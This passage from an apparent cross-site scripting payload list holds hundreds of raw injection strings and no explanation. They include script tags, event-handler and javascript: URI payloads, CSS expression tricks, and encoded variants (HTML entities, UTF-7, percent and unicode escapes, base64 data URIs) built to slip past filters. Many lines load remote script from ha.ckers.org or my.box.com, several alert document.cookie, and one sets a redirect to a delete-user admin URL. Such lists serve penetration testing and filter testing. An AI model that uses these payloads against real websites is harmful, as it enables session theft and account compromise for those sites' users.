src=javascript:alert(&quot;XSS&quot;)>\n<\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>\n<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n<\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search\n<script>alert(\"hellox worldss\")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\n<script>alert(\"XSS\");</script>&search=1\n0&q=';alert(String.fromCharCode(88,83,83))//\\';alert%2?8String.fromCharCode(88,83,83))//\";alert(String.fromCharCode?(88,83,83))//\\\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search\n<h1><font color=blue>hellox worldss</h1>\n<BODY ONLOAD=alert('hellox worldss')>\n<input onfocus=write(XSS) autofocus>\n<input onblur=write(XSS) autofocus><input autofocus>\n<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n<form><button formaction=\"javascript:alert(XSS)\">lol\n<!--<img src=\"--><img src=x onerror=alert(XSS)//\">\n<![><img src=\"]><img src=x onerror=alert(XSS)//\">\n<style><img src=\"</style><img src=x onerror=alert(XSS)//\">\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>alert(1)</script>\">\n<% foo><x foo=\"%><script>alert(123)</script>\">\n<div style=\"font-family:'foo&#10;;color:red;';\">LOL\nLOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>\n<script>({0:#0=alert/#0#/#0#(0)})</script>\n<svg xmlns=\"http://www.w3.org/2000/svg\">LOL<script>alert(123)</script></svg>\n&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;\n\\\\\";alert('XSS');//\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\"XSS\\\");&lt;/SCRIPT&gt;\n&lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;\n&lt;BODY BACKGROUND=\\\"javascript&#058;alert('XSS')\\\"&gt;\n&lt;BODY ONLOAD=alert('XSS')&gt;\n&lt;IMG DYNSRC=\\\"javascript&#058;alert('XSS')\\\"&gt;\n&lt;IMG LOWSRC=\\\"javascript&#058;alert('XSS')\\\"&gt;\n&lt;BGSOUND SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;\n&lt;BR SIZE=\\\"&{alert('XSS')}\\\"&gt;\n&lt;LAYER SRC=\\\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\\\"&gt;&lt;/LAYER&gt;\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript&#058;alert('XSS');\\\"&gt;\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\\\"&gt;\n&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;\n&lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\\\"&gt;\n&lt;STYLE&gt;BODY{-moz-binding&#58;url(\\\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\\\")}&lt;/STYLE&gt;\n&lt;XSS STYLE=\\\"behavior&#58; url(xss&#46;htc);\\\"&gt;\n&lt;STYLE&gt;li {list-style-image&#58; url(\\\"javascript&#058;alert('XSS')\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\n&lt;IMG SRC='vbscript&#058;msgbox(\\\"XSS\\\")'&gt;\n&lt;IMG SRC=\\\"mocha&#58;&#91;code&#93;\\\"&gt;\n&lt;IMG SRC=\\\"livescript&#058;&#91;code&#93;\\\"&gt;\nžscriptualert(EXSSE)ž/scriptu\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript&#058;alert('XSS');\\\"&gt;\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\\\"\n&lt;IFRAME SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;&lt;/IFRAME&gt;\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;&lt;/FRAMESET&gt;\n&lt;TABLE BACKGROUND=\\\"javascript&#058;alert('XSS')\\\"&gt;\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"javascript&#058;alert('XSS')\\\"&gt;\n&lt;DIV STYLE=\\\"background-image&#58; url(javascript&#058;alert('XSS'))\\\"&gt;\n&lt;DIV STYLE=\\\"background-image&#58;\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028&#46;1027\\0058&#46;1053\\0053\\0027\\0029'\\0029\\\"&gt;\n&lt;DIV STYLE=\\\"background-image&#58; url(javascript&#058;alert('XSS'))\\\"&gt;\n&lt;DIV STYLE=\\\"width&#58; expression(alert('XSS'));\\\"&gt;\n&lt;STYLE&gt;@im\\port'\\ja\\vasc\\ript&#58;alert(\\\"XSS\\\")';&lt;/STYLE&gt;\n&lt;IMG STYLE=\\\"xss&#58;expr/*XSS*/ession(alert('XSS'))\\\"&gt;\n&lt;XSS STYLE=\\\"xss&#58;expression(alert('XSS'))\\\"&gt;\nexp/*&lt;A STYLE='no\\xss&#58;noxss(\\\"*//*\\\");\nxss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))'&gt;\n&lt;STYLE TYPE=\\\"text/javascript\\\"&gt;alert('XSS');&lt;/STYLE&gt;\n&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\\\"javascript&#058;alert('XSS')\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background&#58;url(\\\"javascript&#058;alert('XSS')\\\")}&lt;/STYLE&gt;\n&lt;!--&#91;if gte IE 4&#93;&gt;\n&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;\n&lt;!&#91;endif&#93;--&gt;\n&lt;BASE HREF=\\\"javascript&#058;alert('XSS');//\\\"&gt;\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\\\"&gt;&lt;/OBJECT&gt;\n&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;\n&lt;EMBED SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\n&lt;EMBED SRC=\\\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\na=\\\"get\\\";\nb=\\\"URL(\\\\\"\\\";\nc=\\\"javascript&#058;\\\";\nd=\\\"alert('XSS');\\\\\")\\\";\neval(a+b+c+d);\n&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\\\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\\\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\\\"&gt;&#93;&#93;&gt;\n&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\n&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\n&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/SPAN&gt;\n&lt;XML SRC=\\\"xsstest&#46;xml\\\" ID=I&gt;&lt;/XML&gt;\n&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\n&lt;HTML&gt;&lt;BODY&gt;\n&lt;?xml&#58;namespace prefix=\\\"t\\\" ns=\\\"urn&#58;schemas-microsoft-com&#58;time\\\"&gt;\n&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;\n&lt;t&#58;set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\\\"&gt;\n&lt;/BODY&gt;&lt;/HTML&gt;\n&lt;SCRIPT SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\\\"&gt;&lt;/SCRIPT&gt;\n&lt;!--#exec cmd=\\\"/bin/echo '&lt;SCR'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\\\"--&gt;\n&lt;? echo('&lt;SCR)';\necho('IPT&gt;alert(\\\"XSS\\\")&lt;/SCRIPT&gt;'); ?&gt;\n&lt;IMG SRC=\\\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\\\"&gt;\nRedirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser\n&lt;META HTTP-EQUIV=\\\"Set-Cookie\\\" Content=\\\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\\\"&gt;\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n&lt;SCRIPT a=\\\"&gt;\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;SCRIPT =\\\"&gt;\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;SCRIPT a=\\\"&gt;\\\" '' SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;SCRIPT \\\"a='&gt;'\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;SCRIPT a=`&gt;` SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;SCRIPT a=\\\"&gt;'&gt;\\\" SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;SCRIPT&gt;document&#46;write(\\\"&lt;SCRI\\\");&lt;/SCRIPT&gt;PT SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;A HREF=\\\"http&#58;//66&#46;102&#46;7&#46;147/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//1113982867/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"htt\tp&#58;//6\t6&#46;000146&#46;0x7&#46;147/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"//www&#46;google&#46;com/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"//google\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//ha&#46;ckers&#46;org@google\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//google&#58;ha&#46;ckers&#46;org\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//google&#46;com/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//www&#46;google&#46;com&#46;/\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\\\"&gt;XSS&lt;/A&gt;\n&lt;A HREF=\\\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\\\"&gt;XSS&lt;/A&gt;\n&lt;\n%3C\n&lt\n&lt;\n&LT\n&LT;\n&#60\n&#060\n&#0060\n&#00060\n&#000060\n&#0000060\n&lt;\n&#x3c\n&#x03c\n&#x003c\n&#x0003c\n&#x00003c\n&#x000003c\n&#x3c;\n&#x03c;\n&#x003c;\n&#x0003c;\n&#x00003c;\n&#x000003c;\n&#X3c\n&#X03c\n&#X003c\n&#X0003c\n&#X00003c\n&#X000003c\n&#X3c;\n&#X03c;\n&#X003c;\n&#X0003c;\n&#X00003c;\n&#X000003c;\n&#x3C\n&#x03C\n&#x003C\n&#x0003C\n&#x00003C\n&#x000003C\n&#x3C;\n&#x03C;\n&#x003C;\n&#x0003C;\n&#x00003C;\n&#x000003C;\n&#X3C\n&#X03C\n&#X003C\n&#X0003C\n&#X00003C\n&#X000003C\n&#X3C;\n&#X03C;\n&#X003C;\n&#X0003C;\n&#X00003C;\n&#X000003C;\n\\x3c\n\\x3C\n\\u003c\n\\u003C\n&lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;\n&lt;IMG SRC=\\\"javascript&#058;alert('XSS')\\\"\n&lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;\n&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;\n&lt;&lt;SCRIPT&gt;alert(\\\"XSS\\\");//&lt;&lt;/SCRIPT&gt;\n&lt;SCRIPT/SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\\&#93;^`=alert(\\\"XSS\\\")&gt;\n&lt;SCRIPT/XSS SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\\\"&gt;&lt;/SCRIPT&gt;\n&lt;IMG SRC=\\\"   javascript&#058;alert('XSS');\\\"&gt;\nperl -e 'print \\\"&lt;SCR\\0IPT&gt;alert(\\\\\"XSS\\\\\")&lt;/SCR\\0IPT&gt;\\\";' &gt; out\nperl -e 'print \\\"&lt;IMG SRC=java\\0script&#058;alert(\\\\\"XSS\\\\\")&gt;\\\";' &gt; out\n&lt;IMG SRC=\\\"jav&#x0D;ascript&#058;alert('XSS');\\\"&gt;\n&lt;IMG SRC=\\\"jav&#x0A;ascript&#058;alert('XSS');\\\"&gt;\n&lt;IMG SRC=\\\"jav&#x09;ascript&#058;alert('XSS');\\\"&gt;\n&lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;\n&lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;\n&lt;IMG SRC=javascript&#058;alert('XSS')&gt;\n&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;\n&lt;IMG \\\"\\\"\\\"&gt;&lt;SCRIPT&gt;alert(\\\"XSS\\\")&lt;/SCRIPT&gt;\\\"&gt;\n&lt;IMG SRC=`javascript&#058;alert(\\\"RSnake says, 'XSS'\\\")`&gt;\n&lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;\n&lt;IMG SRC=JaVaScRiPt&#058;alert('XSS')&gt;\n&lt;IMG SRC=javascript&#058;alert('XSS')&gt;\n&lt;IMG SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;\n&lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;\n'';!--\\\"&lt;XSS&gt;=&{()}\n';alert(String&#46;fromCharCode(88,83,83))//\\';alert(String&#46;fromCharCode(88,83,83))//\\\";alert(String&#46;fromCharCode(88,83,83))//\\\\\";alert(String&#46;fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\"&gt;'&gt;&lt;SCRIPT&gt;alert(String&#46;fromCharCode(88,83,83))&lt;/SCRIPT&gt;\n';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n'';!--\"<XSS>=&{()}\n<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>\n<IMG SRC=\"javascript:alert('XSS');\">\n<IMG SRC=javascript:alert('XSS')>\n<IMG SRC=javascrscriptipt:alert('XSS')>\n<IMG SRC=JaVaScRiPt:alert('XSS')>\n<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">\n<IMG SRC=\" &#14;  javascript:alert('XSS');\">\n<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>\n\\\";alert('XSS');//\n</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n¼script¾alert(¢XSS¢)¼/script¾\n<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">\n<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">\n<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\">\n<DIV STYLE=\"width: expression(alert('XSS'));\">\n<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\n<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\n<XSS STYLE=\"xss:expression(alert('XSS'))\">\nexp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'>\n<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>\na=\"get\";b=\"URL(ja\\\"\";c=\"vascr\";d=\"ipt:ale\";e=\"rt('XSS');\\\")\";eval(a+b+c+d+e);\n<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>\n<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\"><?import namespace=\"t\" implementation=\"#default#time2\"><t:set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"></BODY></HTML>\n<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n<form id=\"test\" /><button form=\"test\" formaction=\"javascript:alert(123)\">TESTHTML5FORMACTION\n<form><button formaction=\"javascript:alert(123)\">crosssitespt\n<frameset onload=alert(123)>\n<!--<img src=\"--><img src=x onerror=alert(123)//\">\n<style><img src=\"</style><img src=x onerror=alert(123)//\">\n<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">\n<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\">\n<embed src=\"javascript:alert(1)\">\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n<script>({0:#0=alert/#0#/#0#(123)})</script>\n<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>\n<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>\n<script src=\"#\">{alert(1)}</script>;1\n<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>\n<svg xmlns=\"#\"><script>alert(1)</script></svg>\n<svg onload=\"javascript:alert(123)\" xmlns=\"#\"></svg>\n<iframe xmlns=\"#\" src=\"javascript:alert(1)\"></iframe>\n+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\n%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\n+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\n%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\n%253cscript%253ealert(document.cookie)%253c/script%253e\n“><s”%2b”cript>alert(document.cookie)</script>\n“><ScRiPt>alert(document.cookie)</script>\n“><<script>alert(document.cookie);//<</script>\nfoo%00<script>alert(document.cookie)</script>\n<scr<script>ipt>alert(document.cookie)</scr</script>ipt>\n%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E\n‘; alert(document.cookie); var foo=’\nfoo\\’; alert(document.cookie);//’;\n</script><script >alert(document.cookie)</script>\n<img src=asdf onerror=alert(document.cookie)>\n<BODY ONLOAD=alert(’XSS’)>\n<script>alert(1)</script>\n\"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>\n<video src=1 onerror=alert(1)>\n<audio src=1 onerror=alert(1)>\n%u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065\n%u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e\n%u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e\n%u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e\n%u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e\n/\"onafterscriptexecute=alert('XSS') 1='\n<script>alert(123)</script>\n&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;\n<img src=x onerror=alert(123) />\n<svg><script>123<1>alert(123)</script>\n\"><script>alert(123)</script>\n'><script>alert(123)</script>\n><script>alert(123)</script>\n</script><script>alert(123)</script>\n< / script >< script >alert(123)< / script >\n onfocus=JaVaSCript:alert(123) autofocus\n\" onfocus=JaVaSCript:alert(123) autofocus\n' onfocus=JaVaSCript:alert(123) autofocus\n＜script＞alert(123)＜/script＞\n<sc<script>ript>alert(123)</sc</script>ript>\n--><script>alert(123)</script>\n\";alert(123);t=\"\n';alert(123);t='\nJavaSCript:alert(123)\n;alert(123);\nsrc=JaVaSCript:prompt(132)\n\"><script>alert(123);</script x=\"\n'><script>alert(123);</script x='\n><script>alert(123);</script x=\n\" autofocus onkeyup=\"javascript:alert(123)\n' autofocus onkeyup='javascript:alert(123)\n<script\\x20type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x09type=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>\n<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>\n'`\"><\\x3Cscript>javascript:alert(1)</script>\n'`\"><\\x00script>javascript:alert(1)</script>\nABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF\nABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF\nABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF\nABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF\nABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF\nABC<div 